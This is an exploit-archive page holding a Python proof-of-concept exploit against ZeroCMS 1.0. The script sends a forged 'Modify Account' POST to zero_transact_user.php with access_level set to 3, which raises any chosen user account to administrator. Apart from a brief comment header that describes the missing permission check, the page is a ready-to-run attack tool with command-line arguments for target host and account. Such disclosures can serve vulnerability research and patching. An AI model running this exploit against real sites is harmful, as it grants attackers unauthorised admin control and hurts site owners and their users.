ZeroCMS 1.0 - zero_transact_user.php, Handling Privilege Escalation



EKU-ID: 4088 CVE: OSVDB-ID:
Author: Tiago Carvalho Published: 2014-06-16 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


import sys,getopt,cookielib,urllib2,urllib
  
# ZeroCMS 1.0 
# zero_transact_user.php
# Impropper Form post hanling, (parameter polution)
# Vendor: Another Awesome Stuff 
# Product web page: http://www.aas9.in/zerocms/
# author: tiago.alexand@gmail.com
# Tested on: php 5.4.27
# OSVDB ID: 108025
# description
# Summary: ZeroCMS is a very simple Content Management
# System built using PHP and MySQL.
# the script zero_transact_user.php contains a Modify Account case 
# where the execution context doen't have in to consideration the current user's permitions 
# allowing a malcious user to escalate its privileges to admin.  
  
def  exploit(host,email,name,userid):
   access_level = 3 # default for admin
   url = host + '/zero_transact_user.php' #the script handles user related actions
   args = { 'user_id':userid,'email':email, 'name':name,'access_level':access_level,'action':'Modify Account' }
   data = urllib.urlencode(args)
   cj = cookielib.CookieJar()
   opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
   response = opener.open(url,data);
   print response.read()
      
def main(argv):
   host = ''
   email = ''
   accountname = ''
   userid = ''
   try:
      opts, args = getopt.getopt(argv,"hu:m:n:i:")
   except getopt.GetoptError:
      print 'zero_cms_privEscalation.py -u <host> -m <email> -n <account name> -i acount id'
      sys.exit(2)
   for opt, arg in opts:
      if opt == '-h':
         print 'zero_cms_privEscalation.py -u <host> -m <email> -n <account name> -i acount id'
         sys.exit()
      elif opt in ("-u"):
         host = arg
      elif opt in ("-m"):
         email = arg
      elif opt in ("-n"):
         accountname = arg
      elif opt in ("-i"):
         userid = arg
   exploit(host,email,accountname,userid)
  
if __name__ == "__main__":
   main(sys.argv[1:])